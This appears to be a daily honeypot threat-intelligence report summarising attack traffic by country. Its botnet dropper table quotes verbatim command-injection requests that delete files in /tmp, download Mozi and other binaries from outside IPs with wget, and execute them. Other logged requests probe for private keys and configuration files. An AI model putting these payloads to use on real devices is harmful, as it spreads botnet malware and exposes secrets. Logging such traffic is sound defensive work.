Daily Report: 2025-04-27#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 5 stage 1 IP address(es), linked to 5 dropper URL(s).
There are 56 new requests that have never been observed before (these were added to the monitored request database.).
A total of 2477 requests were recorded during the day, originating from 5 different countries, with a peak of 458 requests coming from NL.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
| source_country | targeted_country |
|---|---|
| PT | Australia |
| US | Dubai |
| FR | Israel |
| NL | Israel |
botnet_dropper_behaviour#
| remote_addr | request |
|---|---|
| 121.228.21.17 | GET /shell?cd+/tmp;rm+-rf+*;wget+http://121.228.21.17:57716/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 |
| 190.72.152.73 | GET /shell?cd+/tmp;rm+-rf+*;wget+31.58.51.98/jaws;sh+/tmp/jaws HTTP/1.1 |
| 8.152.208.190 | GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.90.162.234/wdjkalwww/telnet.arm5;chmod+777+/tmp/telnet.arm5;sh+/tmp/telnet.arm5 HTTP/1.1 |
| 139.5.1.142 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://139.5.1.142:53881/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
| 122.97.138.184 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://102.98.81.132:45030/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
| number_of_occurence | request | |
|---|---|---|
| 70 | 6 | GET /login.asp HTTP/1.1 |
| 146 | 3 | GET /configure.php~ HTTP/1.1 |
| 147 | 3 | GET /config/jwt/private.pem HTTP/1.1 |
| 149 | 3 | GET /database.ini HTTP/1.1 |
| 151 | 3 | GET /bower.json HTTP/1.1 |
| 152 | 3 | GET /apache.conf HTTP/1.1 |
| 159 | 3 | GET /admin/serverConfig.json HTTP/1.1 |
| 164 | 3 | GET /appsettings.xml HTTP/1.1 |
| 173 | 3 | GET /rIwQOU0mwVttxBbF/serverConfig.json HTTP/1.1 |
| 220 | 2 | GET /database.xml HTTP/1.1 |
| 264 | 1 | \x00\x0E8]W\x0Ce\xF8\xAA-\xD9\x00\x00\x00\x00\x00 |
| 282 | 1 | POST /api/user/binLookup?time=1745767396272023380 HTTP/1.1 |
| 283 | 1 | GET /api/bin/440393?time=1745767395856538696 HTTP/1.1 |
| 284 | 1 | GET /config/index?time=1745764581169260604 HTTP/1.1 |
| 299 | 1 | \x00\x0E8\xFE\xF1^\xAF\x88m\xF9\xE0\x00\x00\x00\x00\x00 |
| 305 | 1 | GET /..;/env.js HTTP/1.1 |
| 338 | 1 | GET /env.development.js HTTP/1.1 |
| 387 | 1 | \x00\x0E8L9CL6\xB1`A\x00\x00\x00\x00\x00 |
| 456 | 1 | url=setTracerouteCfg |
| 462 | 1 | \x04\x01\x01\xBB@\xE9\xA1c\x00 |
| 476 | 1 | \x00\x0E8^3\xDE\x19+L{:\x00\x00\x00\x00\x00 |
| 493 | 1 | \x04\x01\x01\xBB@\xE9\xA1cadm:12345\x00 |
| 498 | 1 | GET /config/index?time=1745766962017004553 HTTP/1.1 |
| 500 | 1 | POST /api/user/binLookup?time=1745763370457311070 HTTP/1.1 |
| 501 | 1 | GET /api/bin/440393?time=1745763369983893030 HTTP/1.1 |
| 502 | 1 | GET /config/index?time=1745762107314057023 HTTP/1.1 |
| 515 | 1 | POST /api/user/binLookup?time=1745770120677017682 HTTP/1.1 |
| 516 | 1 | GET /api/bin/440393?time=1745770120177632729 HTTP/1.1 |
| 533 | 1 | POST /api/user/binLookup?time=1745776793687853170 HTTP/1.1 |
| 534 | 1 | GET /api/bin/440393?time=1745776793202223550 HTTP/1.1 |
| 538 | 1 | GET /config/index?time=1745775665016057494 HTTP/1.1 |
| 544 | 1 | \x00\x0E8\xDBT7s\x1DY\x9C\xAA\x00\x00\x00\x00\x00 |
| 547 | 1 | POST /api/user/binLookup?time=1745782630312845582 HTTP/1.1 |
| 548 | 1 | GET /api/bin/440393?time=1745782629806604696 HTTP/1.1 |
| 562 | 1 | GET /socket.io/1/?t=1745731793995 HTTP/1.1 |
| 574 | 1 | GET /api/bin/440393?time=1745775602295103103 HTTP/1.1 |
| 575 | 1 | GET /config/index?time=1745774907256770641 HTTP/1.1 |
| 576 | 1 | GET /api/bin/440393?time=1745766740613383475 HTTP/1.1 |
| 577 | 1 | GET /config/index?time=1745764229224196044 HTTP/1.1 |
| 578 | 1 | POST /api/user/binLookup?time=1745762238046094137 HTTP/1.1 |
| 579 | 1 | GET /api/bin/440393?time=1745762237553281303 HTTP/1.1 |
| 580 | 1 | GET /config/index?time=1745761443709323513 HTTP/1.1 |
| 599 | 1 | GET /socket.io/1/?t=1745779962937 HTTP/1.1 |
| 600 | 1 | POST /api/user/binLookup?time=1745779244446451172 HTTP/1.1 |
| 601 | 1 | GET /api/bin/440393?time=1745779244053169351 HTTP/1.1 |
| 604 | 1 | GET /config/index?time=1745776644158141012 HTTP/1.1 |
| 605 | 1 | POST /api/user/binLookup?time=1745775602792853846 HTTP/1.1 |
| 610 | 1 | POST /api/user/binLookup?time=1745779899403829020 HTTP/1.1 |
| 611 | 1 | GET /api/bin/440393?time=1745779898993840799 HTTP/1.1 |
| 616 | 1 | GET /config/index?time=1745776995252646216 HTTP/1.1 |
| 617 | 1 | POST /api/user/binLookup?time=1745776966570666717 HTTP/1.1 |
| 618 | 1 | GET /api/bin/440393?time=1745776966136254599 HTTP/1.1 |
| 619 | 1 | GET /config/index?time=1745775370097791449 HTTP/1.1 |
| 626 | 1 | POST /api/user/binLookup?time=1745763636136986641 HTTP/1.1 |
| 627 | 1 | GET /api/bin/440393?time=1745763635726285359 HTTP/1.1 |
| 628 | 1 | GET /config/index?time=1745762029633446743 HTTP/1.1 |
country_iso_code#
| number_of_occurence | country_iso_code | |
|---|---|---|
| 0 | 458 | NL |
| 1 | 404 | GB |
| 2 | 397 | US |
| 3 | 233 | DE |
| 4 | 186 | SC |
| 5 | 123 | BG |
| 6 | 101 | RU |
| 7 | 99 | PL |
| 8 | 62 | VN |
| 9 | 53 | BE |
| 10 | 51 | HK |
| 11 | 42 | PT |
| 12 | 37 | FR |
| 13 | 32 | IN |
| 14 | 27 | LT |
| 15 | 20 | UA |
| 16 | 19 | CH |
| 17 | 18 | JP |
| 18 | 16 | CN |
| 19 | 13 | CA |
| 20 | 13 | AU |
| 21 | 11 | GH |
| 22 | 8 | VE |
| 23 | 6 | SG |
| 24 | 5 | KR |
| 25 | 5 | TR |
| 26 | 4 | IL |
| 27 | 4 | IR |
| 28 | 4 | AO |
| 29 | 3 | MC |
| 30 | 3 | IT |
| 31 | 3 | ES |
| 32 | 2 | ID |
| 33 | 2 | TH |
| 34 | 2 | BD |
| 35 | 2 | ZA |
| 36 | 2 | BR |
| 37 | 2 | RO |
| 38 | 2 | AZ |
| 39 | 1 | PA |
| 40 | 1 | CL |
| 41 | 1 | HU |